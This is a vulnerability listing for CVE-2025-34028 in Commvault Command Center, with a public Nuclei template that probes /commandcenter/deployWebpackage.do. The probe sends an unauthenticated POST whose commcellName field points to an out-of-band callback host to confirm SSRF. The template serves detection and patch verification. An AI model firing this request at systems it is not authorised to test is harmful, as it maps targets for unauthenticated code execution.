CVE-2025-34028: Commvault - SSRF via /commandcenter/deployWebpackage.do

Date: 2025-08-01 | Affected software: Commvault | PoC: public

Vulnerability description

A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38.

PoC code [public]

id: CVE-2025-34028

info:
  name: Commvault - SSRF via /commandcenter/deployWebpackage.do
  author: DhiyaneshDk,abhishekrautela
  severity: critical
  description: |
    A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38.
  reference:
    - https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html
    - https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34028
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-34028
    cwe-id: CWE-22
    epss-score: 0.73577
    epss-percentile: 0.98769
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="1209838013"
  tags: cve,cve2025,ssrf,oast,commvault,kev,vkev

variables:
  string: "{{to_lower(rand_base(5))}}"

http:
  - raw:
      - |
        POST /commandcenter/deployWebpackage.do HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded

        commcellName={{interactsh-url}}&servicePack={{string}}&version=x

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
          - 'status_code == 900'
        condition: and
# digest: 4a0a00473045022079d8ec05bab0cd8d9db45c4b8e72cd3db7ea50727934a90a6390a2ae133e873b022100bffc45ca6e7549760e05137b9be4fcad83b97ecc4abd4a2c78fa738d2d24b1af:922c64590222798bb761d5b6d8e72950
